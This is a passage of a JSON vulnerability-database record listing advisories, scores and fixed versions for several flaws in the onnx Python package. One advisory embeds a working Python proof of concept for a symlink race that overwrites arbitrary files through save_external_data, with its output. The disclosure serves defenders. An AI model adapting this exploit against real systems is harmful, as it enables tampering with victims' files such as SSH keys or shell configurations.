"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27319" }, { "reference_url": "https://github.com/advisories/GHSA-h8wv-9h96-m4hr", "reference_id": "GHSA-h8wv-9h96-m4hr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h8wv-9h96-m4hr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39078?format=api", "purl": "pkg:pypi/onnx@1.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": 
"VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0" } ], "aliases": [ "CVE-2024-27319", "GHSA-h8wv-9h96-m4hr", "PYSEC-2024-223" ], "risk_score": 4.1, "exploitability": "0.5", "weighted_severity": "8.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g8xb-18u2-6qbe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9337?format=api", "vulnerability_id": "VCID-gc3c-f7yt-nkc1", "summary": "A vulnerability in the `download_model` function of the onnx/onnx framework, before and including version 1.16.1, allows for arbitrary file overwrite due to inadequate prevention of path traversal attacks in malicious tar files. This vulnerability can be exploited by an attacker to overwrite files in the user's directory, potentially leading to remote command execution.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-7776", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0526", "scoring_system": "epss", "scoring_elements": "0.90134", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-7776" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f" }, { "reference_url": "https://github.com/onnx/onnx/pull/6222", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx/pull/6222" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml" }, { "reference_url": "https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-03-20T15:51:57Z/" } ], "url": "https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7776", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", 
"scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7776" }, { "reference_url": "https://github.com/advisories/GHSA-h36j-8vv3-cj52", "reference_id": "GHSA-h36j-8vv3-cj52", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-h36j-8vv3-cj52" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/43602?format=api", "purl": "pkg:pypi/onnx@1.16.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/47711?format=api", "purl": "pkg:pypi/onnx@1.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.17.0" } ], "aliases": [ "CVE-2024-7776", "GHSA-h36j-8vv3-cj52", "PYSEC-2025-10" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gc3c-f7yt-nkc1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/324929?format=api", "vulnerability_id": "VCID-hcza-pev8-vfh5", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27489", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09643", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27489" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/" } ], "url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/" } ], "url": 
"https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190", "reference_id": "1133190", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453929", "reference_id": "2453929", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453929" }, { "reference_url": "https://github.com/advisories/GHSA-3r9x-f23j-gc73", "reference_id": "GHSA-3r9x-f23j-gc73", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3r9x-f23j-gc73" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-27489", "GHSA-3r9x-f23j-gc73" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hcza-pev8-vfh5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/346680?format=api", "vulnerability_id": "VCID-hudf-3jt7-xkaf", "summary": "ONNX: TOCTOU arbitrary file read/write in save_external_dat\n### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an 
arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite the victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### TOCTOU\nThe vulnerable code pattern:\n```python\n # CHECK - Is this a file?\n if not os.path.isfile(external_data_file_path):\n # Line 228-229: USE #1 - Create if it doesn't exist\n with open(external_data_file_path, \"ab\"):\n pass\n \n # Open for writing\n with open(external_data_file_path, \"r+b\") as data_file:\n # Lines 233-243: Write tensor data\n data_file.seek(0, 2)\n if info.offset is not None:\n file_size = data_file.tell()\n if info.offset > file_size:\n data_file.write(b\"\\0\" * (info.offset - file_size))\n data_file.seek(info.offset)\n offset = data_file.tell()\n data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCL | O_CREAT`), allowing the attacker to create a symlink between these two calls that is then followed (absence of `O_NOFOLLOW`). 
By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) alloing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) > 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nmport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n print(f\"[*] Working directory: {tmpdir}\")\n\n # Create a \"sensitive\" file that we'll overwrite\n sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n with open(sensitive_file, 'w') as f:\n f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n original_content = open(sensitive_file, 'rb').read()\n print(f\"[*] Created sensitive file: {sensitive_file}\")\n print(f\" Original content: {original_content}\")\n\n # Create a simple ONNX model with a large tensor\n print(\"[*] Creating ONNX model with external data...\")\n\n # Create a tensor with data > 1KB (to trigger external data)\n large_array = np.ones((100, 100), dtype=np.float32) # 40KB tensor\n large_tensor = from_array(large_array, name='large_weight')\n\n # Create a minimal model\n model = helper.make_model(\n helper.make_graph(\n [helper.make_node('Identity', ['input'], ['output'])],\n 'minimal_model',\n [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n [large_tensor]\n )\n )\n\n # Save model with external data to create the external data file\n model_path = os.path.join(tmpdir, \"model.onnx\")\n external_data_name = 
\"data.bin\"\n external_data_path = os.path.join(tmpdir, external_data_name)\n\n onnx.save_model(\n model, \n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n\n print(f\"[+] Model saved: {model_path}\")\n print(f\"[+] External data created: {external_data_path}\")\n\n # Now comes the attack: replace the external data file with a symlink\n print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n # Remove the legitimate external data file\n if os.path.exists(external_data_path):\n os.remove(external_data_path)\n print(f\" Removed: {external_data_path}\")\n\n # Create symlink pointing to sensitive file\n os.symlink(sensitive_file, external_data_path)\n print(f\" Created symlink: {external_data_path} -> {sensitive_file}\")\n\n # Now load and re-save the model, which will trigger the vulnerability\n print(\"Loading model and saving with external data...\")\n try:\n # Load the model (without loading external data)\n loaded_model = onnx.load(model_path, load_external_data=False)\n\n # Modify the model slightly (to ensure we write new data)\n loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n # Save again - this will call save_external_data() and follow the symlink\n onnx.save_model(\n loaded_model,\n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n except Exception as e:\n print(f\"[-] Error: {e}\")\n \n # Check if the sensitive file was overwritten\n print(\"[*] Checking if sensitive file was modified...\")\n modified_content = open(sensitive_file, 'rb').read()\n \n print(f\" Original size: {len(original_content)} bytes\")\n print(f\" Current size: {len(modified_content)} bytes\")\n print(f\" Original content: {original_content[:50]}\")\n print(f\" Current content: {modified_content[:50]}...\")\n print()\n \n if modified_content != original_content:\n print(\"[!] 
Success!\")\n else:\n print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n Removed: /tmp/tmpqy7z88_l/data.bin\n Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n Original size: 33 bytes\n Current size: 40033 bytes\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n Current content: b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nThe \"sensitive data\" file is successfully overwritten.\n\n### Impact\nThe impact may include filesystem injections (e.g. on SSH keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. 
Path canonicalization", "references": [ { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6" }, { "reference_url": "https://github.com/advisories/GHSA-q56x-g2fj-4rj6", "reference_id": "GHSA-q56x-g2fj-4rj6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q56x-g2fj-4rj6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "GHSA-q56x-g2fj-4rj6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hudf-3jt7-xkaf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9580?format=api", "vulnerability_id": "VCID-ssfy-y61v-mkfm", "summary": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. 
In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28500", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01552", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28500" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m" }, { "reference_url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/" } ], "url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28500", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28500" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209", "reference_id": "1131209", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448518", "reference_id": "2448518", "reference_type": "", "scores": [], "url": 
"https://bugzilla.redhat.com/show_bug.cgi?id=2448518" }, { "reference_url": "https://github.com/advisories/GHSA-hqmj-h5c6-369m", "reference_id": "GHSA-hqmj-h5c6-369m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hqmj-h5c6-369m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/47721?format=api", "purl": "pkg:pypi/onnx@1.21.0rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0rc1" }, { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-28500", "GHSA-hqmj-h5c6-369m", "PYSEC-2026-103" ], "risk_score": 4.1, "exploitability": "0.5", "weighted_severity": "8.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ssfy-y61v-mkfm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/329543?format=api", "vulnerability_id": "VCID-zxjc-1tkz-ykfg", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34445", "reference_id": "", "reference_type": 
"", "scores": [ { "value": "0.00207", "scoring_system": "epss", "scoring_elements": "0.43083", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34445" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/" } ], "url": "https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b" }, { "reference_url": "https://github.com/onnx/onnx/pull/7751", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/" } ], "url": "https://github.com/onnx/onnx/pull/7751" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": 
"generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34445", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34445" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606", "reference_id": "1132606", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453930", "reference_id": "2453930", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453930" }, { "reference_url": "https://github.com/advisories/GHSA-538c-55jv-c5g9", "reference_id": "GHSA-538c-55jv-c5g9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-538c-55jv-c5g9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-34445", "GHSA-538c-55jv-c5g9" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zxjc-1tkz-ykfg" } ], "fixing_vulnerabilities": [], "risk_score": "4.1", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.12.0" }